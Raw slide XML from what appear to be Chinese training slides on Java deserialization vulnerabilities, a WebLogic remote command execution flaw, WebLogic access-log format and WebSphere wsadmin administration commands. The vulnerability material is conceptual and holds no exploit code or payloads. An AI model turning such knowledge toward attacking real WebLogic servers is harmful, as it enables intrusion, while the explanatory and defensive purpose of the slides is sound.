            <a:r>
              <a:rPr sz="18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  <a:p>
            <a:pPr marL="344170" marR="335280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1550"/>
              </a:spcBef>
            </a:pP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Java</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>是指</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>把</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="8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对象转换为字节序列的过程便于保存在内存、文件、数据库中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ObjectOutputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>类 的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writeObject()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方法可以实现序列化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344170">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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Java 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反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>是指把字节序列恢复</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="9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Java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对象的过程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ObjectInputStream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类</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="9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readObject()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方法用于反序列化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344170" marR="147320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>暴露或间接暴露</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>反序列</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>化</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="4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API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，导致</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>用户</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>操作</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>传入数据，攻击者可以精心构造反序列化对象并执行恶意代码</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>。 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>两个或多个看似安全的模块在同一运行环境下，共同产生的安全问</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>题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344170" marR="19494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Java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spc="10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>反序列化漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>产生的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原因</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>大多数是</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="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因为反序列化时没有进行校验</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>，或者有些校验使用黑名单方式又被绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>，  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>最终使得包含恶意代码的序列化对象在服务器端被反序列化执行。核心问题都不是反序列化，但都是因为反序列</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>化 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>导致了恶意代码被执行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355600" marR="1198880" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1395"/>
              </a:spcBef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r>
              <a:rPr sz="1450" spc="380" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EF7E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Oracle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WebLogic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Server 10.3.6.0, 12.1.3.0,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12.2.1.0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和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12.2.1.1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版本存在反序列化远程命令 执行漏洞，恶意人员可以通过构造恶意请求报文远程执行命令，获取系统权限，存在严重的 安全风险。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https://zhuanlan.zhihu.com/p/27898091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4280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Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>WebLogic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>访问日志</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292352" y="3031235"/>
            <a:ext cx="9904730" cy="830580"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9904730" h="830579">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904476" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904476" y="830580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="83058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7144" y="3025940"/>
            <a:ext cx="9914255" cy="840740"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9914255" h="840739">
                <a:moveTo>
                  <a:pt x="9909390" y="840524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="840524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="840282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="839609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="838555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="837234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="835761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830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913924" y="837234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913239" y="838555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9912184" y="839609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9910864" y="840282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="840524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="84073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9914255" h="840739">
                <a:moveTo>
                  <a:pt x="9904628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4"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="840739">
                <a:moveTo>
                  <a:pt x="9904628" y="835761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904628" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="835761"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="840739">
                <a:moveTo>
                  <a:pt x="9914153" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9909390" y="9524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4"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="840739">
                <a:moveTo>
                  <a:pt x="9525" y="835761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="835761"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="840739">
                <a:moveTo>
                  <a:pt x="9904628" y="835761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="835761"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="840739">
                <a:moveTo>
                  <a:pt x="9914153" y="835761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904628" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="83576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3772" y="4087367"/>
            <a:ext cx="9904730" cy="1847214"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9904730" h="1847214">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904476" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904476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8285" y="4083012"/>
            <a:ext cx="9914255" cy="1856739"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9914255" h="1856739">
                <a:moveTo>
                  <a:pt x="9909390" y="1856181"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1856181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1855952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="1855279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1854225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="1852891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1851418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46656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1846656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1851418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="1851418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913924" y="1852891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913251" y="1854225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9912197" y="1855279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9910864" y="1855952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="1856181"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="18567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856739">
                <a:moveTo>
                  <a:pt x="990462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5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="1856739">
                <a:moveTo>
                  <a:pt x="9904628" y="1851418"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904628" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="1846656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="1846656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="1851418"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="1856739">
                <a:moveTo>
                  <a:pt x="9914153" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9909390" y="9525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5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="1856739">
                <a:moveTo>
                  <a:pt x="9525" y="1851418"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1846656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1846656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1851418"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="1856739">
                <a:moveTo>
                  <a:pt x="9904628" y="1851418"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1851418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1846656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="1846656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="1851418"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="1856739">
                <a:moveTo>
                  <a:pt x="9914153" y="1851418"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904628" y="1851418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="1846656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="1846656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="185141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1449547"/>
            <a:ext cx="10557510" cy="442404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目录：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9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dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>通常在</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bea/user_projects/domains/XXXDomain/servers/AdminServer/logs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>目录下，文件名</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="7556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access.log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WebLogic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访问日志的格式：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1305"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>11.137.121.212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[09/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>十二月</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/2009:15:27:15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+0800]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"GET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/piccclaim/style/index.css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HTTP/1.1"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74295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11.137.121.212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[09/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>十二月</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/2009:15:27:15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+0800]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"GET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/piccclaim/style/index.css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HTTP/1.1"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74295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11.137.121.212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[09/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>十二月</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/2009:15:27:15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+0800]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"GET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/piccclaim/acegilogin.jsp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HTTP/1.1"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1203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674370">
              <a:lnSpc>
                <a:spcPts val="1914"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>访问者</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IP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674370">
              <a:lnSpc>
                <a:spcPts val="2155"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>RFC931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Any information returned by IDENTD for the remote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client.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="674370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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>auth_user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67437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访问时</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>间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[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674370" marR="318325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请求方式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"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>请求方式</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(GET/POST</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>等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访问地</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>址</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="70" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular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访问协议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dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>通常为</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP/1.1)"  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>状态：返回代码</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(200</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>表示成功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674370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返回字节数</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>返回数据的字节数大</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>小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7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Websphere</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>管理的使用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57183"/>
            <a:ext cx="9563100" cy="429831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354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1300" spc="21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700" spc="-10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7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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Console</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="17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管理方式</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="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7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25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可以通过如下两种方式访问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5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console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http://ip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地址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:9060/ibm/console</a:t>
            </a:r>
            <a:endParaRPr sz="1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https://ip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地址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:9043/ibm/console</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="5080" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="1610"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1030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204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注意：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="204" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>9060</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="204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和</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="204" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>9043</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="204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是</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>W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eb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phereconsole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默认端口，但是如果集群环境或者用户自己改动过端口，就使用 相应的端口</a:t>
            </a:r>
            <a:endParaRPr sz="15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300" spc="21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700" spc="-5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7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管理方式</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="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7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25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有以下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5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个对象用于提供管理功能：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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Help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：提供通用的帮助信息，同时提供当前正在运行的被管理对象动态在线信息。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AdminConfig</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="15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用来调用配置命令，创建或更改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应用服务器的配置。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AdminControl</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="15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用来调用操作命令，操作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应用服务器中正在运行的对象。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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>AdminApp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="15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用于安装，修改和管理应用程序。</a:t>
            </a:r>
            <a:endParaRPr sz="15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sz="1200" spc="20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500" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>AdminTask</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="-2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5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用于执行管理命令。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7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Websphere</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>管理的使用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851" y="1470723"/>
            <a:ext cx="9647555" cy="30543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支持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JACL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和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jython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两种方式</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-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推荐使用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jython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方式：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JACL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/opt/IBM/WebSphere/AppServer/bin/wsadmin.sh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启动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，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默认使用的的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JACL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$Help help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输出帮助信息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$AdminApp list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列出所有已安装的应用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$AdminTask</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="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listServers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列出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中的应用服务器，包括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sz="1600" spc="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和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Application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="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$AdminConfig list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列出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的配置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$eixt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退出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851" y="1597723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235" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>jy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thon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方式：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051" y="1873186"/>
            <a:ext cx="8484870" cy="22504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/opt/IBM/WebSphere/AppServer/bin/wsadmin.sh-lang</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="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jython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以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jython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方式启动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wsadmin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print AdminControl.getCell()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获取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信息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print AdminControl.getNode()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获取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Node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信息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print AdminControl.help()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获取帮助信息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printAdminConfig.list('JDBCProvider')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列出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JDBC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驱动提供者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297815" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1250" spc="254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print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AdminConfig.list('DataSource')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6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列出数据源</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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690" y="459473"/>
            <a:ext cx="507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2DED1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>Websphere</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2DED1"/>
                </a:solidFill>
